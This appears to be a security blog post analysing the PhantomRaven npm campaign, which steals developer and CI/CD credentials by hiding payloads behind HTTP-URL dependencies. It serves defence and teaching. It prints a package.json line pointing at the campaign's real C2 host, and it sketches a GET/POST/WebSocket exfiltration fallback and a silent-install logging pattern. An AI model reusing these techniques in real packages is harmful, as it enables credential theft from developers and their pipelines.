PhantomRaven: How a Four-Wave npm Campaign Used Remote Dynamic Dependencies to Beat Package Scanning
Commissioned, Curated and Published by Russ. Researched and written with AI.
What’s New
Endor Labs published their full technical analysis of Waves 2-4 on 10-11 March 2026, identifying 88 new packages across three previously unreported waves. At the time of writing, 81 of those 88 packages remain live on npm. Two of the four C2 servers are still responding. On 12 March, the Wave-2 payload was silently replaced with a console.log('Hello, world!') – demonstrating exactly why URL dependencies are a structural risk: the author changed what every dependent package executes without publishing a single update.
Changelog
| Date | Summary |
|---|---|
| 12 Mar 2026 | Initial publication. |
In October 2025, Koi Security published a disclosure: 126 malicious npm packages, over 86,000 downloads, and a campaign they named PhantomRaven. The packages were stealing developer credentials – GitHub tokens, CI/CD secrets, email addresses from .gitconfig and .npmrc. npm pulled the packages. Case closed, apparently.
It wasn’t. Three more waves followed in November, December, and February. Endor Labs tracked them through infrastructure correlation and published their findings this week. 88 new packages. 50 disposable npm accounts. The same C2 infrastructure, the same 259-line payload, the same credential-theft playbook – just different domains and a new batch of plausible package names.
The campaign is still running.
What PhantomRaven Steals
The malicious payload is 259 lines of JavaScript, and it is remarkably consistent. Across all four waves, Endor Labs found that 257 of those 259 lines are byte-for-byte identical. The only lines that differ are 162-163, which hold the C2 URL.
What those 259 lines do, once executed:
- Developer email harvesting. The payload reads from four sources: environment variables, ~/.gitconfig, ~/.npmrc, and the local package.json author field. Every email address it finds goes to the attacker.
- CI/CD token collection. Twenty environment variables from GitHub Actions, GitLab CI, Jenkins, and CircleCI are explicitly targeted. If you run npm install in a CI pipeline – which is nearly every pipeline – and that pipeline has any of those variables set, they’re exfiltrated.
- System fingerprinting. IP address (via a call to api64.ipify.org), hostname, OS, Node version. The attacker builds a profile of every machine the package lands on.
- Triple-redundant exfiltration. The data goes out via HTTP GET first, then HTTP POST, then WebSocket fallback. This layered approach is specifically designed to maximise success across varied network environments – GET bypasses POST-only inspection, POST handles URL length limits, WebSocket evades HTTP-layer firewalls. The attacker has thought about what network controls developers operate under.
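The fallback ordering can be sketched with injected transports – the function and field names below are illustrative, not the payload's actual source; the point is the try-each-channel-in-order structure:

```javascript
// Sketch of a GET → POST → WebSocket fallback chain. Transports are injected
// so the ordering can be demonstrated without a real C2 server.
function exfiltrate(data, transports) {
  // Try each channel in order; move on only when the previous one fails.
  for (const send of [transports.httpGet, transports.httpPost, transports.webSocket]) {
    try {
      return send(data); // the first channel that succeeds wins
    } catch {
      // e.g. a POST-only inspection proxy, a URL length limit, an HTTP-layer firewall
    }
  }
  return null; // every channel blocked
}
```

The structure explains why the approach is resilient: a network control that blocks one channel simply pushes the data onto the next.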
The exfiltration runs silently. All console.log and console.error calls are wrapped in if (!isPreinstall) – during npm install, the terminal shows nothing while the data transfer happens in the background.
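The suppression pattern is simple to sketch. This is an illustration of the behaviour described above, not the payload's source; reading npm_lifecycle_event is one plausible way such a flag could be set, and is an assumption here:

```javascript
// Silent-install pattern: every console call is gated on a preinstall flag,
// so `npm install` output stays clean while the payload runs.
// ASSUMPTION: detecting the phase via npm's lifecycle env var.
const isPreinstall = process.env.npm_lifecycle_event === 'preinstall';

function quietLog(message, preinstall = isPreinstall) {
  // Mirrors the `if (!isPreinstall)` wrapping described above:
  // log only when NOT running as a preinstall hook.
  if (!preinstall) console.log(message);
}
```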
Remote Dynamic Dependencies: The Technique That Beats Static Scanning
This is the part that matters architecturally. PhantomRaven does not embed malicious code in its packages. The packages published to npm contain only a harmless Hello World script. The malicious payload lives on the attacker’s server.
Here is how the delivery works:
In a standard npm package.json, dependencies are listed with version ranges: "some-library": "^1.2.0". npm resolves these from the registry. PhantomRaven instead specifies an HTTP URL: "ui-styles-pkg": "http://npm.jpartifacts.com/npm/jam3". npm’s own resolution mechanism fetches a tarball from that URL during install. The tarball contains the payload, which executes via a preinstall hook.
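Side by side, the difference is one line in the manifest. The package name and first dependency below are illustrative; the URL dependency is the one reported in the research:

```json
{
  "name": "some-innocuous-package",
  "version": "1.0.0",
  "dependencies": {
    "some-library": "^1.2.0",
    "ui-styles-pkg": "http://npm.jpartifacts.com/npm/jam3"
  }
}
```

npm treats the URL as a tarball location and downloads it during install; the preinstall hook that executes the payload is declared in the fetched tarball's own package.json, not in anything published to the registry.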
The npm package itself is clean. Any tool that scans the package contents finds nothing – because there is nothing to find. The malicious code arrives at install time from an external server, fetched by npm’s own dependency resolution, not by any attacker-controlled process running in the package.
This is what Koi Security called Remote Dynamic Dependencies (RDD). It is not a novel idea – pulling second-stage payloads from external servers is common in malware. What makes RDD specifically interesting is that it delegates the download to npm’s own infrastructure. npm is doing the fetch. The package just has an unusual dependency URL.
The consequence for tooling is concrete: npm audit analyses packages in the registry against known vulnerability data – it does not evaluate whether a dependency URL points to an attacker’s server. Snyk and Socket scan package code for suspicious patterns. A package whose entire malicious surface is an HTTP URL in a dependency field passes most of those checks.
Endor Labs detected PhantomRaven not by scanning package contents but by following external dependency chains and correlating infrastructure signals – the domains containing “artifact”, the identical WHOIS fingerprints, the no-TLS HTTP-only C2 servers. Detection required looking at what the packages fetched, not what they contained.
The March 12 event makes the structural risk explicit. When the Wave-2 C2 payload was replaced with console.log('Hello, world!'), every one of the 50 Wave-2 packages simultaneously changed what they execute on install – with zero changes to the npm registry. The author flipped a single file on one server. That is the capability RDD hands to whoever controls the C2 domain.
Why Developer Environments Are the Target
This campaign does not target production systems. It targets developer machines and CI pipelines. That is a deliberate choice, and it reflects a real asymmetry in how organisations think about privilege.
A developer machine typically has: a GitHub token with write access to the organisation’s repositories, AWS credentials that aren’t constrained to specific resources, secrets in .env files that have never been rotated because “this is just dev”, and SSH keys that work on internal infrastructure. CI pipelines have it worse – they hold the deployment keys, the cloud access, the package signing credentials that are the actual crown jewels of an organisation’s software delivery.
Production workloads run in hardened environments with constrained IAM roles, network controls, and monitored access. Developer machines run with whatever the developer installed last Tuesday. The gap in privilege control between a production EC2 instance and the laptop that deploys to it is significant, and that gap is the attack surface PhantomRaven is exploiting.
This is the same pattern as the five malicious Rust crates published earlier this year – different ecosystem, same target. Developer credential access is the objective. The ecosystem is just the delivery mechanism.
Four Waves Means a Working Operation
The timeline matters here. Koi Security disclosed Wave 1 on October 29, 2025. The attacker registered the Wave-2 C2 domain on November 4 – six days later. Wave 3 infrastructure went up February 13, three days after the last Wave-2 package. Wave 4 appeared February 18, one day after Wave 3 finished.
This is not a threat actor who published some packages, got caught, and moved on. This is someone watching their own takedowns, registering new infrastructure within days, and continuing to publish. The payload barely changed across seven months. The Wave-4 C2 tarball still has "author": "JPD" – the author never updated it, because updating it wasn’t necessary. The core technique kept working.
The operational pattern – rotating accounts, domains, and metadata while leaving the payload unchanged – suggests a threat actor who has assessed their ROI and found the campaign worth continuing. 86,000+ downloads in Wave 1. Likely more across Waves 2-4. They have developer credentials. Whether those credentials have been used for anything beyond collection is not currently known.
The infrastructure is consistent enough that Endor Labs could cluster all four waves from external signals alone: all four C2 domains registered through Amazon Registrar, all using Identity Protection Service WHOIS privacy, all on AWS Route53, all HTTP-only with zero TLS. The attacker’s operational security is good enough to stay operational across four waves, but not so good that correlation across waves is impossible.
The Broader Supply Chain Pattern
Three separate campaigns in three separate ecosystems, all in the last six months:
PhantomRaven (npm, RDD): Packages whose malicious payload lives off-registry, fetched by npm’s own resolution mechanism. Bypasses static package analysis by having nothing to analyse.
Five Rust crates (crates.io, curl): Packages that ran a straightforward curl-based exfil of .env files, combined with an AI-powered bot targeting open source maintainers via GitHub Actions. Published here.
nx supply chain tokens: Persisting credentials extracted from the Nx build system ecosystem.
Different actors, different ecosystems, different techniques – same objective. Developer credentials in CI/CD pipelines. The pattern is supply chain as credential vector. If a developer installs it, it is an attack surface. The specific package registry is secondary.
What is notable about the trajectory is that the techniques are getting harder to detect with standard tooling. The Rust crates used straightforward curl commands that a competent scanner would flag. RDD is specifically designed to put the malicious surface outside the scanner’s field of view. The defensive tooling that caught earlier campaigns is being studied and evaded.
What to Actually Do
“Run npm audit” is not sufficient. PhantomRaven was designed to pass npm audit. Here is what actually helps:
Network egress monitoring at install time. The RDD technique makes an outbound HTTP request during npm install. That request goes to a domain you have never seen before, on port 80, with no TLS. In a properly instrumented CI pipeline, that is a detectable anomaly. Log all outbound connections during the install phase. Alert on unexpected external hosts. This catches RDD in a way that package scanning cannot.
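As a sketch of what that alert logic might look like – assuming you already capture outbound connections during the install phase; the record shape and allowlist here are invented for illustration:

```javascript
// Flag install-phase connections that look like RDD fetches: anything going
// to a host outside the expected registry set, or plain HTTP on port 80
// without TLS (the PhantomRaven C2 signature).
// ASSUMPTION: connection records of the form { host, port, tls }.
const EXPECTED_HOSTS = new Set(['registry.npmjs.org']);

function flagInstallEgress(connections) {
  return connections.filter(
    (c) => !EXPECTED_HOSTS.has(c.host) || (c.port === 80 && !c.tls)
  );
}
```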
Install-time behaviour analysis. Tools like Socket have moved toward analysing what packages do rather than what they contain – network calls, file system access, environment variable reads. This is the right direction. Static analysis of package contents is insufficient for campaigns that externalise their payload.
Validate package.json dependency fields for external URLs. Before merging a package-lock.json update, check whether any dependency has been resolved from an HTTP URL rather than the npm registry. This is automatable and would flag RDD directly.
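A minimal version of that check, assuming you have the manifest and lockfile already parsed as objects – the field names follow npm's standard package.json and lockfile (v2/v3) formats, everything else is illustrative:

```javascript
// Scan a parsed package.json for dependency specs that are URLs rather
// than semver ranges.
function findUrlDependencies(manifest) {
  const hits = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(manifest[field] ?? {})) {
      if (/^(https?:|git\+|git:)/.test(spec)) hits.push({ field, name, spec });
    }
  }
  return hits;
}

// Scan a parsed package-lock.json for entries resolved from anywhere
// other than the expected registry.
function findNonRegistryResolved(lockfile, registry = 'https://registry.npmjs.org/') {
  return Object.entries(lockfile.packages ?? {})
    .filter(([, meta]) => meta.resolved && !meta.resolved.startsWith(registry))
    .map(([path, meta]) => ({ path, resolved: meta.resolved }));
}
```

Either function returning a non-empty list is a reasonable CI gate: fail the build and make a human look at the offending entry.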
Lockfile integrity in CI. Commit package-lock.json and enforce npm ci rather than npm install in pipelines. RDD can still work within a lockfile if the lockfile is poisoned, but this reduces the surface for lockfile-bypassing attacks and is good hygiene regardless.
Treat developer machines as high-privilege identities. Short-lived credentials. Token rotation. AWS IAM roles scoped to actual requirements rather than broad dev access. This is the same advice from the pipeline hardening post, and it applies here directly. A developer machine with a 90-day-old unscoped AWS key is a more valuable target than the production system it deploys to.
Package scanning is a necessary layer of defence. It is not a sufficient one. PhantomRaven was specifically architected to defeat it – by ensuring that at the moment of scanning, there was nothing malicious to scan.
The defensive layer that catches RDD is not better static analysis. It is runtime behaviour monitoring: what does this package do when it executes, what does it connect to, what data does it read. The payload does not exist until install time. That is when you need to be looking.
Related: Five Malicious Rust Crates and an AI Bot – the same supply chain credential pattern in a different ecosystem. Also The CLINEjection Attack and AI Agent Pipeline Hardening.